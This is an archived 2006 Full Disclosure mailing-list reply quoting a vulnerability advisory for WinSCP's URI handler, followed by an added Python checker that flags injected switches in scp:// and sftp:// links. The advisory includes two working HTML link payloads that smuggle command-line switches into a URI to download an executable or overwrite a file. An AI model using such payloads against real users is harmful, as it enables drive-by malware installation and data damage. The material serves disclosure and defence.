Full Disclosure mailing list archives

Re: WinSCP - URI Handler Command Switch Parsing


From: Juha-Matti Laurio <juha-matti.laurio () netti fi>
Date: Sun, 11 Jun 2006 16:37:01 +0300 (EEST)

Your e-mail has the following Date field:
Fri, 10 Mar 2006 21:24:12 +0100

My e-mail client says 'Sent: 10.3.2006 22:24:12' because of this.

Archive puts it to Jun 11th, however:
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046810.html

- Juha-Matti


Jelmer Kuperus <jkuperus () planet nl> wrote:

WinSCP - URI Handler Command Switch Parsing

About winscp :

WinSCP is an open source freeware SFTP client for Windows using SSH.
Legacy SCP protocol is also supported. Its main function is safe copying
of files between a local and a remote computer.

Versions affected :

It was tested on WinSCP 3.8.1 , previous versions may or may not be
affected

Description :

During a typical installation of winscp several URI handlers are
installed. (scp:// sftp://) It is possible to include additional command
line switches to be passed to winscp

Some of these switches may initiate a file transfer, sending a
specified file to an arbitrary ftp, or they may download executables to
a location on a pc where they would be executed, e.g. the startup folder

If you create an html page with these contents

<a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd%20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>

And click on the link it would automatically download malware.exe to
c:\ (assuming the host is in the cache, otherwise user interaction is
required)

clicking on

<a href="scp://jelmer@127.0.0.1:22/%22%20%22/log=c:%5csomefile%22">log</a>

would append log output to c:\somefile possibly rendering the file
unusable in the process. Note that this also works when the host is not
in the cache

Vendor status :

Martin Prikryl was notified June 04, 2006. He will "think about a
solution"



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
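
An added example, not part of the original posts and not WinSCP code: a defender-side check that a URI-handler wrapper could run on scp:// and sftp:// links before passing them to a client, flagging the double quote and the /console, /command and /log= switches seen in the advisory. The function name, the sample URIs and the assumption that the link is percent-decoded before it reaches the command line are constructed for illustration.

```python
from urllib.parse import urlsplit, unquote

# Schemes the advisory says the installer registers handlers for.
HANDLED_SCHEMES = {"scp", "sftp"}
# Switches that appear in the advisory's two example links.
SWITCHES_ON_PAGE = ("/console", "/command", "/log=")

# Constructed sample inputs (not captured traffic).
SAMPLE_BENIGN = "sftp://alice@files.example.com:22/home/alice/"
SAMPLE_FLAGGED = "scp://user@host.example:22/%22%20/console"


def audit_handler_uri(uri):
    """Return a sorted list of findings; an empty list means nothing was flagged."""
    parts = urlsplit(uri)
    if parts.scheme.lower() not in HANDLED_SCHEMES:
        return ["scheme is not scp or sftp"]
    findings = set()
    # Assumption: inspect the percent-decoded form, since %22 and %20 in the
    # link become a quote and a space by the time arguments are parsed.
    decoded = unquote(uri)
    if '"' in decoded:
        findings.add("decoded URI contains a double quote")
    if any(ord(ch) < 0x20 for ch in decoded):
        findings.add("decoded URI contains control characters")
    # Split on the same delimiters a command line uses (quotes, whitespace)
    # and flag any resulting token that begins with a switch from the page.
    for token in decoded.replace('"', " ").split():
        for switch in SWITCHES_ON_PAGE:
            if token.lower().startswith(switch):
                findings.add("switch-like token: " + switch)
    return sorted(findings)


if __name__ == "__main__":
    for sample in (SAMPLE_BENIGN, SAMPLE_FLAGGED):
        result = audit_handler_uri(sample)
        print(sample, "->", result if result else "ok")
```

A path such as /home/alice/ is not flagged because it stays inside the single URL token; only a token that starts at a quote or space boundary is compared against the switch list.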
